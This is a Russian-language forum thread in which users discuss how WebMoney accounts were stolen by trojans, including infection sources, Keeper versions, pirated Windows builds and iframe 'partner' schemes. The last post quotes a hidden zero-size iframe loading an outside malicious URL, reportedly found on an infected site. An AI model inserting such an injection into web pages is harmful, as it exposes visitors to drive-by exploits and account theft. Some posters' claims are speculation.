У кого украли Webmoney и доступ к ним - давайте разберемся наконец-то?

_vb_
На сайте с 25.07.2009
104
Hoodie:
Но он заставляет задуматься: а не делают ли разработчики WM то, чего многие из нас давно ждали – подтверждения каждого перевода через Enum?

Оно давно уже сделано в кипер-лайт.

Саратовская фракция серча (). Давайте посчитаемся.
S
На сайте с 19.03.2010
88
Raskrutchik:
Если подтверждение каждого перевода через Enum можно будет отключить в настройках кипера, то это будет еще одна псевдозащита.

Если троян отправляет хозяину ключи/сертификаты и кражу денег делает человек, а не программа - такая псевдозащита бесполезна.

seamonkey добавил 02.04.2010 в 09:48

Слэш:
,Я неприличные сайты не посещаю :) Позавчера например, когда залез троян, это в основном были блоги манимейкеров 😂

Сами манимейкеры вряд ли трояном награждают. Но есть "замечательные" вирусорассадники, типа систем обмена трафом, напр. lank.ru

В погоне за лишней копейкой манимейкеры запросто могут влепить такую хрень на свой сайт, не подозревая при этом, что распространяют троянов.

PRelude
На сайте с 20.07.2007
35

Более того некоторые уроды сейчас начали предлагать "партнерские программы" вполне приличным сайтам. Дескать, вы размещаете наш ифрейм, а мы вам за это копеечку платим, Не ведитесь на такие предложения.

ISDN :)
На сайте с 28.02.2006
171

Я хотел бы обратить внимание пользователей на новую модификацию этого трояна. В окошке браузера всплывает ошибка «типа» системного процесса, однако дизайн странноват, каспер удачно блокирует его. Но все происходит, как надо…в папке с вебмоней левый файл не появляется. На email ничего не приходит. Кража происходит сразу после смены троем вашего пароля в кипере…

PS: стоит Zver CD v9.9.9 SP3 + KIS 2010. Radmin у меня нет.

X
На сайте с 11.12.2006
75

Я не осилил всю ветку, но я так понял все случаи краж с Класика, а с Лайт версии крадут? Если да то как?

Голь на выдумки хитра. © Народная мудрость
Atteon
На сайте с 13.07.2007
159
ISDN :):

PS: стоит Zver CD

Дальше можно было не продолжать. Народ, прекратите юродствовать, пользуетесь ломанной-переломанной виндой без обновлений и потом воете о краже бабла. Ну разоритесь вы раз на лицензионную винду (или халявный линукс поставьте), ну хватит позориться... горе-манимейкеры :(

ISDN :)
На сайте с 28.02.2006
171
Atteon:
Дальше можно было не продолжать. Народ, прекратите юродствовать, пользуетесь ломанной-переломанной виндой без обновлений и потом воете о краже бабла. Ну разоритесь вы раз на лицензионную винду (или халявный линукс поставьте), ну хватит позориться... горе-манимейкеры :(

Я с этой сборкой много лет (старые версии) работаю, так что доверие к ней есть. Я описал реальную ситуацию, взлом был именно после окошка на 2-й день где-то...Не думаю, что Вам бы помог в таком случае лицензионный WinXP с последними обновлениями.

_vb_
На сайте с 25.07.2009
104
xronikus:
Я не осилил всю ветку, но я так понял все случаи краж с Класика, а с Лайт версии крадут? Если да то как?

С лайта тырят при использовании для авторизации сертификата "X.чего то там".

N
На сайте с 26.03.2008
70
ISDN :):
Я с этой сборкой много лет (старые версии) работаю, так что доверие к ней есть. Я описал реальную ситуацию, взлом был именно после окошка на 2-й день где-то...Не думаю, что Вам бы помог в таком случае лицензионный WinXP с последними обновлениями.

Есть люди, которые верят, что покупка лицензионного ХР автоматом делает его неуявизвымым для троянов и вирусов. :)

H
На сайте с 01.04.2010
12

urod.ru скорее всего содержал сплоит, процентов на 90% я уверен что хапнул именно оттуда

добавил......

вот что там висит щас

<noindex><iframe src="http://trfistb.info/for.cgi?tank" width="0" height="0" style="visibility: hidden;"></iframe></noindex>

Нормально?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий